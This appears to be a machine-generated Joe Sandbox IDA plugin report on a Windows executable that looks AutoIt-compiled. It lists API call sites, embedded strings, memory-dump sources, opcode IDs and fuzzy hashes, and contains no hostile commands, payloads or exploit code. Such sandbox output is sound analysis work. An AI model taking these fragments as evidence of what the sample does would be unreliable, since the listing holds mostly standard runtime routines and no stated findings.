                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 311963372-2391861430
                                                            APIs
                                                              • Part of subcall function 00830B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00816C6C,?,00008000), ref: 00830BB7
                                                              • Part of subcall function 008148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008148A1,?,?,008137C0,?), ref: 008148CE
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00816D0D
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00816E5A
                                                              • Part of subcall function 008159CD: _wcscpy.LIBCMT ref: 00815A05
                                                              • Part of subcall function 0083387D: _iswctype.LIBCMT ref: 00833885
                                                            Strings
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 537147316-1018226102
                                                            APIs
                                                            • _memset.LIBCMT ref: 008145F9
                                                            • GetMenuItemCount.USER32(008D6890), ref: 0084D7CD
                                                            • GetMenuItemCount.USER32(008D6890), ref: 0084D87D
                                                            • GetCursorPos.USER32(?), ref: 0084D8C1
                                                            • SetForegroundWindow.USER32(00000000), ref: 0084D8CA
                                                            • TrackPopupMenuEx.USER32(008D6890,00000000,?,00000000,00000000,00000000), ref: 0084D8DD
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0084D8E9
                                                            Similarity
                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                            • String ID:
                                                            • API String ID: 2751501086-0
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00890038,?,?), ref: 008910BC
                                                            Strings
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            APIs
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                              • Part of subcall function 00817A84: _memmove.LIBCMT ref: 00817B0D
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008755D2
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008755E8
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008755F9
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0087560B
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0087561C
                                                            Strings
                                                            Similarity
                                                            • API ID: SendString$_memmove
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 2279737902-1007645807
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 208665112-3771769585
                                                            APIs
                                                            • timeGetTime.WINMM ref: 0087521C
                                                              • Part of subcall function 00830719: timeGetTime.WINMM(?,7694B400,00820FF9), ref: 0083071D
                                                            • Sleep.KERNEL32(0000000A), ref: 00875248
                                                            • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0087526C
                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0087528E
                                                            • SetActiveWindow.USER32 ref: 008752AD
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008752BB
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 008752DA
                                                            • Sleep.KERNEL32(000000FA), ref: 008752E5
                                                            • IsWindow.USER32 ref: 008752F1
                                                            • EndDialog.USER32(00000000), ref: 00875302
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                            • String ID: BUTTON
                                                            • API String ID: 1194449130-3405671355
                                                            APIs
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            • CoInitialize.OLE32(00000000), ref: 0087D855
                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0087D8E8
                                                            • SHGetDesktopFolder.SHELL32(?), ref: 0087D8FC
                                                            • CoCreateInstance.OLE32(008A2D7C,00000000,00000001,008CA89C,?), ref: 0087D948
                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0087D9B7
                                                            • CoTaskMemFree.OLE32(?,?), ref: 0087DA0F
                                                            • _memset.LIBCMT ref: 0087DA4C
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0087DA88
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0087DAAB
                                                            • CoTaskMemFree.OLE32(00000000), ref: 0087DAB2
                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0087DAE9
                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 0087DAEB
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                            • String ID:
                                                            • API String ID: 1246142700-0
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 008705A7
                                                            • SetKeyboardState.USER32(?), ref: 00870612
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00870632
                                                            • GetKeyState.USER32(000000A0), ref: 00870649
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00870678
                                                            • GetKeyState.USER32(000000A1), ref: 00870689
                                                            • GetAsyncKeyState.USER32(00000011), ref: 008706B5
                                                            • GetKeyState.USER32(00000011), ref: 008706C3
                                                            • GetAsyncKeyState.USER32(00000012), ref: 008706EC
                                                            • GetKeyState.USER32(00000012), ref: 008706FA
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00870723
                                                            • GetKeyState.USER32(0000005B), ref: 00870731
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 00c8939f1432a0cfa5094e0ac795471833e05c4ed8b10b1d70b6f288845f4644
                                                            • Instruction ID: fa11d0e570ac6ccc35949e467cf99f3758a79ba7d5291b369fcb8bed504b4c29
                                                            • Opcode Fuzzy Hash: 00c8939f1432a0cfa5094e0ac795471833e05c4ed8b10b1d70b6f288845f4644
                                                            • Instruction Fuzzy Hash: CF51FD20A0478459FF34DBA488547EABFB4FF11380F08C59AD5CADA5C6D664DA8CCF62
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 0086C746
                                                            • GetWindowRect.USER32(00000000,?), ref: 0086C758
                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0086C7B6
                                                            • GetDlgItem.USER32(?,00000002), ref: 0086C7C1
                                                            • GetWindowRect.USER32(00000000,?), ref: 0086C7D3
                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0086C827
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0086C835
                                                            • GetWindowRect.USER32(00000000,?), ref: 0086C846
                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0086C889
                                                            • GetDlgItem.USER32(?,000003EA), ref: 0086C897
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0086C8B4
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0086C8C1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: e042c6264cfcd6cedef9a3ebcc20394403ad1148f77a10c61d8a8f35dc5bc1b1
                                                            • Instruction ID: dc1e5e1ac3a648a481000089f1c4ab6a704e9d6c54713c71438846f7e6cb1ce0
                                                            • Opcode Fuzzy Hash: e042c6264cfcd6cedef9a3ebcc20394403ad1148f77a10c61d8a8f35dc5bc1b1
                                                            • Instruction Fuzzy Hash: A6515D71B00205ABDB18DFA9DD89AAEBBBAFB98310F14813DF616D7291D7709D008B10
                                                            APIs
                                                              • Part of subcall function 00811B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00812036,?,00000000,?,?,?,?,008116CB,00000000,?), ref: 00811B9A
                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008120D3
                                                            • KillTimer.USER32(-00000001,?,?,?,?,008116CB,00000000,?,?,00811AE2,?,?), ref: 0081216E
                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0084BEF6
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008116CB,00000000,?,?,00811AE2,?,?), ref: 0084BF27
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008116CB,00000000,?,?,00811AE2,?,?), ref: 0084BF3E
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008116CB,00000000,?,?,00811AE2,?,?), ref: 0084BF5A
                                                            • DeleteObject.GDI32(00000000), ref: 0084BF6C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 641708696-0
                                                            • Opcode ID: 3a73cefaadcafc30de4e4d9ce03f820fb024bd2fdaf19a65583e96e2e6105017
                                                            • Instruction ID: a17dc6d817f4d24ec6d4c880936a8e828d99c6d5e8c3f8f35c92c2279f65a363
                                                            • Opcode Fuzzy Hash: 3a73cefaadcafc30de4e4d9ce03f820fb024bd2fdaf19a65583e96e2e6105017
                                                            • Instruction Fuzzy Hash: E961AC30101A18EFCB29EF18DD48B69B7F5FF54316F14862AE242C6960DB75A8E4EF41
                                                            APIs
                                                              • Part of subcall function 008125DB: GetWindowLongW.USER32(?,000000EB), ref: 008125EC
                                                            • GetSysColor.USER32(0000000F), ref: 008121D3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ColorLongWindow
                                                            • String ID:
                                                            • API String ID: 259745315-0
                                                            • Opcode ID: 1dfa69b45d6f2cac0bc9ef17757f9969f2f99eb875d2c8760721b707ef11d40e
                                                            • Instruction ID: 36f089c753ee02d5e4e2a8aa3f2daa50db3c091d49654b9a83d89f75ae2ddc2a
                                                            • Opcode Fuzzy Hash: 1dfa69b45d6f2cac0bc9ef17757f9969f2f99eb875d2c8760721b707ef11d40e
                                                            • Instruction Fuzzy Hash: F34171311001449ADB255F28DC48BF97769FF06325F184366FE65CA1E6D7318C92DB51
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,0089F910), ref: 0087AB76
                                                            • GetDriveTypeW.KERNEL32(00000061,008CA620,00000061), ref: 0087AC40
                                                            • _wcscpy.LIBCMT ref: 0087AC6A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 2820617543-1000479233
                                                            • Opcode ID: e52260959ce496467414a4ac6eaeb6d8be0d275cb00575efae9f5304804999c5
                                                            • Instruction ID: 43c32c13c19926c4f121ee5307947dc5f2c949cbaa7c446cbe96b47205ecc0d3
                                                            • Opcode Fuzzy Hash: e52260959ce496467414a4ac6eaeb6d8be0d275cb00575efae9f5304804999c5
                                                            • Instruction Fuzzy Hash: 4E51AC301083059BC728EF58C891EAEB7A9FFC4314F14882DF59AD72A6DB31D949CA53
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __i64tow__itow__swprintf
                                                            • String ID: %.15g$0x%p$False$True
                                                            • API String ID: 421087845-2263619337
                                                            • Opcode ID: 34bf7876378149eb31e240d0f8dab0bea03e35e30ac60d0be2b91380217ca64e
                                                            • Instruction ID: 015e7142f3da9cc330231a583262c48fa6807d4db40c213184e4598ff578df3f
                                                            • Opcode Fuzzy Hash: 34bf7876378149eb31e240d0f8dab0bea03e35e30ac60d0be2b91380217ca64e
                                                            • Instruction Fuzzy Hash: F241E771604209AFDB24DF38D852FBA7BE8FF44304F20446EE689D7292EE759941CB52
                                                            APIs
                                                            • _memset.LIBCMT ref: 008973D9
                                                            • CreateMenu.USER32 ref: 008973F4
                                                            • SetMenu.USER32(?,00000000), ref: 00897403
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00897490
                                                            • IsMenu.USER32(?), ref: 008974A6
                                                            • CreatePopupMenu.USER32 ref: 008974B0
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008974DD
                                                            • DrawMenuBar.USER32 ref: 008974E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                            • String ID: 0$F
                                                            • API String ID: 176399719-3044882817
                                                            • Opcode ID: 208dcd215e77509440cdfd82fa5c2815cebca46ea492f9946f5b722a58e70f7b
                                                            • Instruction ID: 0039025e00cca7650fe1a4cee041165c73b2d280c105009a4e89ff11ac6cc2d7
                                                            • Opcode Fuzzy Hash: 208dcd215e77509440cdfd82fa5c2815cebca46ea492f9946f5b722a58e70f7b
                                                            • Instruction Fuzzy Hash: 68415874A11209EFDF10EF68D884A9ABBB9FF49310F184129FA55E7362D731A920CB54
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 008977CD
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 008977D4
                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 008977E7
                                                            • SelectObject.GDI32(00000000,00000000), ref: 008977EF
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 008977FA
                                                            • DeleteDC.GDI32(00000000), ref: 00897803
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0089780D
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00897821
                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0089782D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                            • String ID: static
                                                            • API String ID: 2559357485-2160076837
                                                            • Opcode ID: 612a640b9b36128ea10a19b7f5defc30af2ffd66e8a71e0119d6374c5939bced
                                                            • Instruction ID: 8139bf923cb874e42aefcead6e8818d43265da9992247204d38864748d2ff4f2
                                                            • Opcode Fuzzy Hash: 612a640b9b36128ea10a19b7f5defc30af2ffd66e8a71e0119d6374c5939bced
                                                            • Instruction Fuzzy Hash: 4931BE31101215BBDF16AFA4DC08FDA3B69FF0D320F180225FA15E20A1C731D821DBA4
                                                            APIs
                                                            • _memset.LIBCMT ref: 0083707B
                                                              • Part of subcall function 00838D68: __getptd_noexit.LIBCMT ref: 00838D68
                                                            • __gmtime64_s.LIBCMT ref: 00837114
                                                            • __gmtime64_s.LIBCMT ref: 0083714A
                                                            • __gmtime64_s.LIBCMT ref: 00837167
                                                            • __allrem.LIBCMT ref: 008371BD
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008371D9
                                                            • __allrem.LIBCMT ref: 008371F0
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0083720E
                                                            • __allrem.LIBCMT ref: 00837225
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00837243
                                                            • __invoke_watson.LIBCMT ref: 008372B4
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                            • String ID:
                                                            • API String ID: 384356119-0
                                                            • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                            • Instruction ID: 96043bc3dfeac7b66100e9cddaa62cca3695e350071aa6e6f7dbad2149207729
                                                            • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                            • Instruction Fuzzy Hash: B3710AB1A04B0BABE7249E7DCC81B5BB3A8FF91324F14422AF815E7281E774D90087D1
                                                            APIs
                                                            • _memset.LIBCMT ref: 00872A31
                                                            • GetMenuItemInfoW.USER32(008D6890,000000FF,00000000,00000030), ref: 00872A92
                                                            • SetMenuItemInfoW.USER32(008D6890,00000004,00000000,00000030), ref: 00872AC8
                                                            • Sleep.KERNEL32(000001F4), ref: 00872ADA
                                                            • GetMenuItemCount.USER32(?), ref: 00872B1E
                                                            • GetMenuItemID.USER32(?,00000000), ref: 00872B3A
                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00872B64
                                                            • GetMenuItemID.USER32(?,?), ref: 00872BA9
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00872BEF
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00872C03
                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00872C24
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                            • String ID:
                                                            • API String ID: 4176008265-0
                                                            • Opcode ID: 17aec11ed2d032eeb140b69d9140cb0f2e3860943e1892188fe831ad83c6c6bb
                                                            • Instruction ID: 8fd7309b5f547613a52895d14191302aef7737e18cd51714c578c71e46ee9265
                                                            • Opcode Fuzzy Hash: 17aec11ed2d032eeb140b69d9140cb0f2e3860943e1892188fe831ad83c6c6bb
                                                            • Instruction Fuzzy Hash: F061EEB0900249EFDB21DF64CC88EAEBBB8FB51318F14855AE849E3256D730ED15DB21
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00897214
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00897217
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0089723B
                                                            • _memset.LIBCMT ref: 0089724C
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0089725E
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008972D6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow_memset
                                                            • String ID:
                                                            • API String ID: 830647256-0
                                                            • Opcode ID: f73d4fcd160a66ec506a37b34a7b2766aef6f928a03e2302eba57909c7e0b4ad
                                                            • Instruction ID: 2ad057b31f85c18a4baa0b1e447eef7bae869c35f8a3a072d88fb3fd593d4c39
                                                            • Opcode Fuzzy Hash: f73d4fcd160a66ec506a37b34a7b2766aef6f928a03e2302eba57909c7e0b4ad
                                                            • Instruction Fuzzy Hash: C8616D71A00208AFDB10EFA4CC81EEE77B8FB09714F14016AFA15E73A1D770A955DB50
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00867135
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 0086718E
                                                            • VariantInit.OLEAUT32(?), ref: 008671A0
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 008671C0
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00867213
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00867227
                                                            • VariantClear.OLEAUT32(?), ref: 0086723C
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00867249
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00867252
                                                            • VariantClear.OLEAUT32(?), ref: 00867264
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0086726F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: 802ecf66d36e97601916a55c7f86a7f6d7fcaf3c4a8fa8883fd4963c0dda9cf4
                                                            • Instruction ID: 614983bf9f1645d5386876491d9b59969c7732e895e7897ce303bef6cfa8007f
                                                            • Opcode Fuzzy Hash: 802ecf66d36e97601916a55c7f86a7f6d7fcaf3c4a8fa8883fd4963c0dda9cf4
                                                            • Instruction Fuzzy Hash: A0416031A00119AFCF04EF68D854DEEBBB9FF48354F058069FA56E7261DB30A945CB91
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00885AA6
                                                            • inet_addr.WSOCK32(?,?,?), ref: 00885AEB
                                                            • gethostbyname.WSOCK32(?), ref: 00885AF7
                                                            • IcmpCreateFile.IPHLPAPI ref: 00885B05
                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00885B75
